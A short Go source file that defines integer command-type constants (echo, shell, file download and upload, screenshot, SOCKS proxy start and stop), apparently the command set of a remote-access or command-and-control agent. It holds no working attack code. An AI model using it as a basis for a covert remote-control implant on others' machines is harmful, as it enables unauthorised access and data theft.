package cmds

const (
	ECHO_CMD_TYPE          = 1
	SHELL_CMD_TYPE         = 2
	DOWNLOAD_FILE_CMD_TYPE = 3
	UPLOAD_FILE_CMD_TYPE   = 4
	SCREENSHOT_CMD_TYPE    = 5
	START_SOCKS_CMD_TYPE   = 6
	STOP_SOCKS_CMD_TYPE    = 7
)
